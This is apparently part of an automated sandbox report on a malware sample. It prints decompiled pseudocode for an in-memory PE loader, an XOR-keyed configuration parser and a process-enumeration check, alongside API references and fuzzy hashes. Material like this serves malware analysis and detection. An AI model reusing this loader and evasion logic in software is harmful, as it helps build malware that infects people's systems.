
Download Yara Rule

C-Code - Quality: 37%

			E6E0C1FB4(void* __eax, intOrPtr _a4) {

				 *0x6e0c4150 =  *0x6e0c4150 & 0x00000000;
				_push(0);
				_push(0x6e0c414c);
				_push(1);
				_push(_a4);
				 *0x6e0c4148 = 0xc; // executed
				L6E0C1B50(); // executed
				return __eax;
			}

0x6e0c1fb4
0x6e0c1fbb
0x6e0c1fbd
0x6e0c1fc2
0x6e0c1fc4
0x6e0c1fc8
0x6e0c1fd2
0x6e0c1fd7

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E0C1745,00000001,6E0C414C,00000000), ref: 6E0C1FD2

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: c170b818b4cae5cdde0228552a3ec7534ca92b945d34e85a6d2d66c8bd6c40e2
Instruction ID: cc229dc64e18f0fe6e4c7d00cf4d8152cac2ae39ba4c7e5b384dd90e6e6c73c0
Opcode Fuzzy Hash: c170b818b4cae5cdde0228552a3ec7534ca92b945d34e85a6d2d66c8bd6c40e2
Instruction Fuzzy Hash: 2EC04C75140740BBEA209B808C49F497A617761F05F111504FA99272C093B550598916

Uniqueness

Uniqueness Score: -1.00%

Function 6E0C1B56, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E0C1B56(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e0c4140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0c4140 - 0x63698bc4 &  !( *0x6e0c4140 - 0x63698bc4);
				_t18 = E6E0C1879( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0c4140 - 0x63698bc4 &  !( *0x6e0c4140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0c4140 - 0x63698bc4 &  !( *0x6e0c4140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E0C13B1(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E0C160D(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E0C10AD(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E0C105D(_t42);
					L8:
					return _t29;
				}
			}

0x6e0c1b5e
0x6e0c1b60
0x6e0c1b7c
0x6e0c1b8d
0x6e0c1b94
0x6e0c1bf2
0x00000000
0x6e0c1b96
0x6e0c1b96
0x6e0c1ba0
0x6e0c1ba4
0x6e0c1ba9
0x6e0c1bac
0x6e0c1bb1
0x6e0c1bb5
0x6e0c1bba
0x6e0c1bbf
0x6e0c1bc3
0x6e0c1bc8
0x6e0c1bc9
0x6e0c1bcd
0x6e0c1bd2
0x6e0c1bda
0x6e0c1bda
0x6e0c1bd2
0x6e0c1bc3
0x6e0c1bb5
0x6e0c1bdc
0x6e0c1be5
0x6e0c1be9
0x6e0c1bf3
0x6e0c1bf9
0x6e0c1bf9

APIs

Part of subcall function 6E0C1879: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E0C1B92,?,?,?,?,?,00000002,?,?), ref: 6E0C189D
Part of subcall function 6E0C1879: GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18BF
Part of subcall function 6E0C1879: GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18D5
Part of subcall function 6E0C1879: GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18EB
Part of subcall function 6E0C1879: GetProcAddress.KERNEL32(00000000,?), ref: 6E0C1901
Part of subcall function 6E0C1879: GetProcAddress.KERNEL32(00000000,?), ref: 6E0C1917

Part of subcall function 6E0C13B1: memcpy.NTDLL(?,?,?), ref: 6E0C13E8
Part of subcall function 6E0C13B1: memcpy.NTDLL(?,?,?), ref: 6E0C141D

Part of subcall function 6E0C160D: LoadLibraryA.KERNELBASE ref: 6E0C1645

Part of subcall function 6E0C10AD: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0C10E6
Part of subcall function 6E0C10AD: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0C115B
Part of subcall function 6E0C10AD: GetLastError.KERNEL32 ref: 6E0C1161

GetLastError.KERNEL32(?,?), ref: 6E0C1BD4

Memory Dump Source

Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true

Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: bba85b62123c81a68582727412f40077db187f1b687abc778a8a026ab2452732
Instruction ID: 18fa12ba08dec5d04ca90c0cf7933d7e4a7585a45d73e4958cf42f8125b2ea03
Opcode Fuzzy Hash: bba85b62123c81a68582727412f40077db187f1b687abc778a8a026ab2452732
Instruction Fuzzy Hash: 93112B7A6007056FC710ABE9CC84EDF77BCAF88B187044559EA0197645EBB0E90A8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB574A, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00BB574A(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0xbbd330;
				E00BB91D9();
				while(1) {
					_t8 = E00BB896F(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E00BB8ECC(_t14);
					if(_t15 == 0) {
						HeapFree( *0xbbd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E00BB91D9();
					if(_t19 != 0) {
						_t22 =  *0xbbd338; // 0x3619b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x00bb5752
0x00bb5756
0x00bb5757
0x00bb5758
0x00bb575d
0x00bb5762
0x00bb5769
0x00bb5770
0x00000000
0x00000000
0x00bb5772
0x00bb5777
0x00bb5778
0x00bb577f
0x00bb5799
0x00000000
0x00bb5781
0x00bb5781
0x00bb5783
0x00bb5786
0x00bb578a
0x00000000
0x00000000
0x00bb578c
0x00bb578a
0x00bb57a1
0x00bb57a1
0x00bb57a3
0x00bb57aa
0x00bb57ac
0x00bb57b2
0x00bb57b9
0x00bb57c9
0x00bb57c1
0x00bb57c4
0x00bb57c4
0x00bb57cc
0x00bb57cc
0x00bb57d5
0x00bb57d5
0x00bb579f
0x00000000

APIs

Part of subcall function 00BB91D9: GetProcAddress.KERNEL32(36776F57,00BB5762), ref: 00BB91F4

Part of subcall function 00BB896F: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00BB899A
Part of subcall function 00BB896F: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00BB89BC
Part of subcall function 00BB896F: memset.NTDLL ref: 00BB89D6
Part of subcall function 00BB896F: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00BB8A14
Part of subcall function 00BB896F: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00BB8A28
Part of subcall function 00BB896F: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00BB8A3F
Part of subcall function 00BB896F: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00BB8A4B
Part of subcall function 00BB896F: lstrcat.KERNEL32(?,642E2A5C), ref: 00BB8A8C
Part of subcall function 00BB896F: FindFirstFileA.KERNELBASE(?,?), ref: 00BB8AA2

Part of subcall function 00BB8ECC: lstrlen.KERNEL32(?,00000000,00BBD330,00000001,00BB577D,00BBD00C,00BBD00C,00000000,00000005,00000000,00000000,?,?,?,00BB8880,00BB197C), ref: 00BB8ED5
Part of subcall function 00BB8ECC: mbstowcs.NTDLL ref: 00BB8EFC
Part of subcall function 00BB8ECC: memset.NTDLL ref: 00BB8F0E

HeapFree.KERNEL32(00000000,00BBD00C,00BBD00C,00BBD00C,00000000,00000005,00000000,00000000,?,?,?,00BB8880,00BB197C,00BBD00C,?,00BB197C), ref: 00BB5799

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 983081259-0
Opcode ID: 3ded6dfdbd1686a5ba2c9d9a9dd9544fe1fe313455228293c50c3f3043509798
Instruction ID: f1ab69666413f80b5afecd50afa13e1290859ebe40be1d3e4b7c36c0ddb6ef34
Opcode Fuzzy Hash: 3ded6dfdbd1686a5ba2c9d9a9dd9544fe1fe313455228293c50c3f3043509798
Instruction Fuzzy Hash: C801F136700305EFEB20AFE7CC85BFA76D8EB44B60B6000B6B945D6050DEE4DC81A666

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1CCE, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BB1CCE(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E00BB386E(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0xbbd238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E00BB9CC9(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00bb1cce
0x00bb1cd6
0x00bb1ced
0x00bb1d08
0x00bb1d0c
0x00bb1d11
0x00bb1d13
0x00bb1d25
0x00bb1d31
0x00bb1d15
0x00bb1d15
0x00bb1d1a
0x00bb1d1f
0x00bb1d1f
0x00bb1d13
0x00bb1d37
0x00bb1d3b
0x00bb1d3b
0x00bb1ce2
0x00bb1ce7
0x00bb1ceb
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00BB9CC9: SysFreeString.OLEAUT32(00000000), ref: 00BB9D2C

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,00BB872D,?,004F0053,03619388,00000000,?), ref: 00BB1D31

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 4820f315611c55139cd2089336200805998ca855509444c5620c6a33d4e716eb
Instruction ID: 0ba4a0f51ae02498fc5b11565e663834c1234d6313df414991e883a511448dfa
Opcode Fuzzy Hash: 4820f315611c55139cd2089336200805998ca855509444c5620c6a33d4e716eb
Instruction Fuzzy Hash: C7014F32500519BBCB229F58DC11EFA7FB5EF04790F448964FE049A120D7B1D960DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9D43, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BB9D43(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E00BBA1A1(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E00BB1D9E(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x00bb9d4b
0x00bb9d65
0x00000000
0x00bb9d81
0x00bb9d5c
0x00bb9d63
0x00000000
0x00000000
0x00bb9d88

APIs

lstrlenW.KERNEL32(?,?,?,00BB96B8,3D00BBC0,80000002,00BBA82A,00BB23DB,74666F53,4D4C4B48,00BB23DB,?,3D00BBC0,80000002,00BBA82A,?), ref: 00BB9D68

Part of subcall function 00BB1D9E: SysAllocString.OLEAUT32(00BB23DB), ref: 00BB1DB7
Part of subcall function 00BB1D9E: SysFreeString.OLEAUT32(00000000), ref: 00BB1DF8

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 83805b8b5251eb14b79841ce667f6c34e14c90d87a9843424d227101083ff0c2
Instruction ID: d0a7473b0e9136c2623bb28919c708f6afda4fe1b386a090f25927bc045fe961
Opcode Fuzzy Hash: 83805b8b5251eb14b79841ce667f6c34e14c90d87a9843424d227101083ff0c2
Instruction Fuzzy Hash: 86F07F3200010EBBDF129F95DC46EEA3FAAEF18391F048065BA1454061D7B2C9B1EBA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E10A8B9, Relevance: 16.7, APIs: 11, Instructions: 162COMMON

Download Yara Rule

APIs

___crtGetLocaleInfoA.LIBCMT ref: 6E10A90B

Part of subcall function 6E11185F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E11186B
Part of subcall function 6E11185F: __crtGetLocaleInfoA_stat.LIBCMT ref: 6E111880

GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6E10A91D
___crtGetLocaleInfoA.LIBCMT ref: 6E10A93D
___crtGetLocaleInfoA.LIBCMT ref: 6E10A97F
__calloc_crt.LIBCMT ref: 6E10A952

Part of subcall function 6E10B167: __calloc_impl.LIBCMT ref: 6E10B176

__calloc_crt.LIBCMT ref: 6E10A994
_free.LIBCMT ref: 6E10A9AC
_free.LIBCMT ref: 6E10A9EC
__calloc_crt.LIBCMT ref: 6E10AA16
_free.LIBCMT ref: 6E10AA3C
__invoke_watson.LIBCMT ref: 6E10AA8C

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
String ID:
API String ID: 1731282729-0
Opcode ID: d59e9945ae76d58965d698d2fba2552028bb78076c10559119eb551c563c9af3
Instruction ID: 51cae7c0d1636e89e716d6ee9466b69b4b055271640f95c6bc85a92fa07bd417
Opcode Fuzzy Hash: d59e9945ae76d58965d698d2fba2552028bb78076c10559119eb551c563c9af3
Instruction Fuzzy Hash: 5851BF71A1421AAFEB60CFA58D41FDABBBDEF14314F6084A5F80992141EF318DD4AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BB62D8, Relevance: 9.2, APIs: 6, Instructions: 223
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00BB62D8(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0xbbd2a0; // 0x63699bc3
				if(E00BB5171( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0xbbd2d4 = _v12;
				}
				_t25 =  *0xbbd2a0; // 0x63699bc3
				if(E00BB5171( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0xbbd2a0; // 0x63699bc3
						_t31 = E00BB5322(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xbbd240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0xbbd2a0; // 0x63699bc3
						_t32 = E00BB5322(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xbbd244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0xbbd2a0; // 0x63699bc3
						_t33 = E00BB5322(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xbbd248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0xbbd2a0; // 0x63699bc3
						_t34 = E00BB5322(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0xbbd004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0xbbd2a0; // 0x63699bc3
						_t35 = E00BB5322(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0xbbd02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0xbbd2a0; // 0x63699bc3
						_t36 = E00BB5322(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E00BB902E(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E00BB98F9();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0xbbd2a0; // 0x63699bc3
						_t37 = E00BB5322(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E00BB902E(0, _t37) != 0) {
						_t102 =  *0xbbd32c; // 0x36195b0
						E00BB1D3E(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0xbbd2a0; // 0x63699bc3
						_t38 = E00BB5322(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0xbbd2a4; // 0x2a5a5a8
						_t18 = _t39 + 0xbbe252; // 0x616d692f
						 *0xbbd2d0 = _t18;
						goto L52;
					} else {
						_t49 = E00BB902E(0, _t38);
						 *0xbbd2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0xbbd2a0; // 0x63699bc3
								_t41 = E00BB5322(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0xbbd2a4; // 0x2a5a5a8
								_t19 = _t42 + 0xbbe791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E00BB902E(0, _t41);
							}
							 *0xbbd340 = _t43;
							HeapFree( *0xbbd238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}

0x00bb62d8
0x00bb62db
0x00bb62fb
0x00bb6309
0x00bb6309
0x00bb630e
0x00bb6328
0x00bb6526
0x00bb6528
0x00000000
0x00bb632e
0x00bb632e
0x00bb6335
0x00bb634b
0x00bb6337
0x00bb6337
0x00bb6344
0x00bb6344
0x00bb6355
0x00bb6357
0x00bb6361
0x00bb6366
0x00bb6366
0x00bb6361
0x00bb636d
0x00bb6383
0x00bb636f
0x00bb636f
0x00bb637c
0x00bb637c
0x00bb6387
0x00bb6389
0x00bb6393
0x00bb6398
0x00bb6398
0x00bb6393
0x00bb639f
0x00bb63b5
0x00bb63a1
0x00bb63a1
0x00bb63ae
0x00bb63ae
0x00bb63b9
0x00bb63bb
0x00bb63c5
0x00bb63ca
0x00bb63ca
0x00bb63c5
0x00bb63d1
0x00bb63e7
0x00bb63d3
0x00bb63d3
0x00bb63e0
0x00bb63e0
0x00bb63eb
0x00bb63ed
0x00bb63f7
0x00bb63fc
0x00bb63fc
0x00bb63f7
0x00bb6403
0x00bb6419
0x00bb6405
0x00bb6405
0x00bb6412
0x00bb6412
0x00bb641d
0x00bb641f
0x00bb6429
0x00bb642e
0x00bb642e
0x00bb6429
0x00bb6435
0x00bb644b
0x00bb6437
0x00bb6437
0x00bb6444
0x00bb6444
0x00bb644f
0x00bb6451
0x00bb6454
0x00bb6455
0x00bb645c
0x00bb645e
0x00bb645f
0x00bb645f
0x00bb645c
0x00bb6466
0x00bb647c
0x00bb6468
0x00bb6468
0x00bb6475
0x00bb6475
0x00bb6480
0x00bb648e
0x00bb6498
0x00bb6498
0x00bb649f
0x00bb64b5
0x00bb64a1
0x00bb64a1
0x00bb64ae
0x00bb64ae
0x00bb64b9
0x00bb64cc
0x00bb64cc
0x00bb64d1
0x00bb64d7
0x00000000
0x00bb64bb
0x00bb64be
0x00bb64c3
0x00bb64ca
0x00bb64dc
0x00bb64de
0x00bb64f4
0x00bb64e0
0x00bb64e0
0x00bb64ed
0x00bb64ed
0x00bb64f8
0x00bb6504
0x00bb6509
0x00bb6509
0x00bb64fa
0x00bb64fd
0x00bb64fd
0x00bb6517
0x00bb651c
0x00bb6529
0x00bb652d
0x00bb652d
0x00000000
0x00bb64ca
0x00bb64b9

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB635D
StrToIntExA.SHLWAPI(00000000,00000000,?,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB638F
StrToIntExA.SHLWAPI(00000000,00000000,?,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB63C1
StrToIntExA.SHLWAPI(00000000,00000000,?,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB63F3
StrToIntExA.SHLWAPI(00000000,00000000,?,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB6425
HeapFree.KERNEL32(00000000,00BB1971,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB651C

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c2f96072e7696e32d622288b51be71a896e91bdf11cb0a6c1eabad66abf80cca
Instruction ID: 3ecaea3339e428e3f8185426a388a395ffa67d4ab44ccdda74e9878b7b0a56bf
Opcode Fuzzy Hash: c2f96072e7696e32d622288b51be71a896e91bdf11cb0a6c1eabad66abf80cca
Instruction Fuzzy Hash: 21617C60A00A44AFC720EBB8DDC99FB77EDEB483407640AA5E502D7215FAFDDD01CA25

Uniqueness

Uniqueness Score: -1.00%

Function 6E12770D, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6E127724
_wcscmp.LIBCMT ref: 6E127735
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E127751
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E12777B

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: InfoLocale_wcscmp
String ID:
API String ID: 1351282208-0
Opcode ID: c6341a5dbce270518687af483a9166dba13fd0f6f0700d7424f26c2d8e359106
Instruction ID: a5055a90d9e015d4042af51f1c186057ccdf1a39a61fc09a1ac187abf6a24dd8
Opcode Fuzzy Hash: c6341a5dbce270518687af483a9166dba13fd0f6f0700d7424f26c2d8e359106
Instruction Fuzzy Hash: 95019231204516BFDF409EA5ED88FC737ACAF05765B218036F909DA1C4EB61D5C1B780

Uniqueness

Uniqueness Score: -1.00%

Function 00BB24C7, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00BB24C7() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xbbd2a4; // 0x2a5a5a8
						_t2 = _t9 + 0xbbee54; // 0x73617661
						_push( &_v264);
						if( *0xbbd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00bb24d2
0x00bb24dc
0x00bb24e0
0x00bb24ea
0x00bb251b
0x00bb24f1
0x00bb24f6
0x00bb2503
0x00bb250c
0x00bb2523
0x00bb250e
0x00bb2516
0x00000000
0x00bb2516
0x00bb2524
0x00bb2525
0x00000000
0x00bb2525
0x00000000
0x00bb251f
0x00bb252b
0x00bb2530

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB24D7
Process32First.KERNEL32(00000000,?), ref: 00BB24EA
Process32Next.KERNEL32(00000000,?), ref: 00BB2516
CloseHandle.KERNEL32(00000000), ref: 00BB2525

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
